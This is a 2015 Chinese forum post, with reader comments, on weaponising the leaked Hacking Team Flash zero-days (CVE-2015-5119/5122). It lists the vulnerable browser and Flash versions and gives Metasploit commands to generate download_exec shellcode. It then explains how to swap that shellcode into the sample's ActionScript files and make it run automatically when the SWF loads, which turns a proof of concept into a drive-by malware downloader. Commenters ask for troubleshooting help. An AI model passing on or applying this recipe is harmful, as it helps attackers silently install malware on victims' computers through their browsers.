Hacking Team flash 0day 快速利用介绍

三好学生 | 2015-07-13 09:54

0x00 目标

利用Hacking Team 的flash 0day样本(CVE-2015-5119&CVE-2015-5122),改造升级,支持downloader&exec。

0x01 测试环境

Windows 7 SP1 (64-bit)

ie8.0.7600.16385

Adobe Flash Player 18,0,0,194

0x02 样本分析

已知成功环境:

Windows 7 SP1 (32-bit) IE11 Adobe Flash 18.0.0.194

Windows 7 SP1 (32-bit) Firefox 38.0.5 Adobe Flash 18.0.0.194

Windows 8.1 (32-bit) Firefox Adobe Flash 18.0.0.194

Linux Mint "Rebecca" (32 bits) Firefox 33.0 Adobe Flash 11.2.202.468

0x03 样本测试:

swf文件,ie加载后点击Run calc.exe,弹出计算器

如图1:

swf文件,ie加载后点击Run calc.exe,弹出计算器

0x04 简单修改

需要对样本做两处修改:

改造:实现downloader&exec

升级:swf加载后自动执行shellcode

1. 生成shellcode

use windows/download_exec

set exe

set URL

generate -t dword

2.生成swf

开发环境:Adobe Flash CS6

(1)替换shellcode

ShellWin32.as和ShellWin64.as文件中Vector.<uint>内容改为shellcode

(2)实现自动触发

修改MyClass.as文件

(3)编译

---

仅作测试,不许抄作业,后果自负

[原文地址]

各种吐槽:

1#

浮萍 | 2015-07-13 09:55

图呢

2#

三好学生 | 2015-07-13 09:56

@浮萍 我先学习一下zone怎么用~

3#

蒙塔基的钢弹 (放下面子,求真学习,拾起斗志,用心渗透!) | 2015-07-13 11:03

@三好学生 私信QQ了,可否即时交流下?

4#

三好学生 | 2015-07-13 11:25

@蒙塔基的钢弹 你骗我,我怎么没有发现私信

5#

0x02 | 2015-07-13 11:58

@三好学生 这个是还没写完?前排坐等

6#

Sunshie (http://phpinfo.me欢迎友链) | 2015-07-13 12:06

https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb

7#

三好学生 | 2015-07-13 12:14

@0x02 已经无法再编辑,我该怎么办

8#

DM_ (http://x0day.me) | 2015-07-13 12:16

zone里有markdown就好了

9#

三好学生 | 2015-07-13 12:27

其余内容已被DM_和谐,与本人无关

留言评论(旧系统):

佚名 @ 2015-07-16 10:41:29

这个MyClass.as文件怎么修改,请指教

本站回复:

具体你了解一下flash修改方法。

佚名 @ 2015-07-17 09:22:23

改成download_exec就不能运行了,

本站回复:

继续改。

佚名 @ 2015-07-20 16:25:55

win7 ie 还是崩溃 不中啊。。2003和xp是可以的 win7 要直接本地把swf拖进ie才可以。。

本站回复:

-_-!!!

佚名 @ 2015-07-29 07:19:39

给下载到桌面了 怎么设置路径呢

本站回复: